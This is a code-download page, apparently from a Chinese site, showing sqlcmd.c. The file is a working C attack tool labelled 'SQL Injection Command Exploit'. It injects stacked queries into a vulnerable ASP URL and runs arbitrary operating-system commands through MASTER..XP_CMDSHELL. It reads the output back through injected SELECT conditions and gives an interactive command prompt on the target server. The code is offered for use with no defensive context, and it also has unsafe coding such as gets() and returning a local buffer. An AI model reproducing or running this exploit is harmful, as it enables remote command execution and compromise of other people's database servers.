⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 sqlcmd.c

📁 asp网站sql注入有关命令执行之c、C++源码
💻 C
字号:
🔍 
#include <windows.h>
#include <winsock2.h>
#include <wininet.h>
#include <stdlib.h>
#pragma comment(lib, "wininet.lib")

char *injurl,*type,*end;
char *GetResult(char *url)
{
	char buffer[1024*8];
	DWORD dwBytesRead=0;
	HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
	HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
	BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
	InternetCloseHandle(hUrlFile);
	InternetCloseHandle(hNet);
	return buffer;
}
char *ExecCommand(char *cmd)
{
	char url[1024],buff[1024],result[1024],*response,*p,*p1;
	int n=1,i,j;
	memset(url,0,sizeof(url));
	wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL '%s';insert into [SIC_Tmp] values ('[g_over]')--",injurl,type,cmd);
	response=GetResult(url);
    while(1){
	memset(buff,0,sizeof(buff));
	memset(result,0,sizeof(result));
	wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then '[CoolDiyer][CoolDiyer]' else '[CoolDiyer]'%%2BResultTxt%%2B'[CoolDiyer]' end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
	response=GetResult(url);
	if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
		else {
				puts("Cann't Injection It");
				return;
		}
	strncpy(buff,p+11,p1-p-11);
	if (!strcmp(buff,"[g_over]")){
		wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
		GetResult(url);
		return;
	}
	//filter
	for(i=0,j=0;i<strlen(buff);i++,j++){
		if(buff[i]=='&' && buff[i+2]=='t' && buff[i+3]==';'){
			if (buff[i+1]=='l')result[j]='<';
			if (buff[i+1]=='g')result[j]='>';
			i+=3;
		}
		else if(buff[i]=='&' && buff[i+1]=='q' && buff[i+2]=='u' && buff[i+3]=='o' && buff[i+4]=='t' && buff[i+5]==';'){
			result[j]='"';
			i+=5;
		}
			else result[j]=buff[i];
		}
	puts(result);
	memset(url,0,sizeof(url));
	n++;
	}
}
void main(int argc,char **argv)
{
	char cmd[1024];
		printf("=[Sql Inj CMD]======================================================\n");
		printf("\tSQL Injection Command Exploit Powered By CoolDiyer\n\n");
		if(argc!=3){
		printf("\tUsage:  sqlcmd.exe <InjURL> <type>\n");
		printf("\t\tType:\t0->Number    1->char    2->Search\n");
		printf("\tExample:\n\t\tsqlcmd.exe http://localhost/index.asp?id=1 0\n");
		printf("=05-12-22===========================================================\n");
		return;
	}
	injurl=argv[1];
	if(atoi(argv[2])==0){
		type="";
		end="";
	}
	if(atoi(argv[2])==1){
		type="'";
		end=" and ''='";
	}
	if(atoi(argv[2])==2){
		type="%'";
		end=" and '%'='";
	}
	while (1)
	{
	printf("Sql Inj CMD>");
	gets(cmd);
	if (!strcmpi(cmd,"exit"))return;
	ExecCommand(cmd);
	}
}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -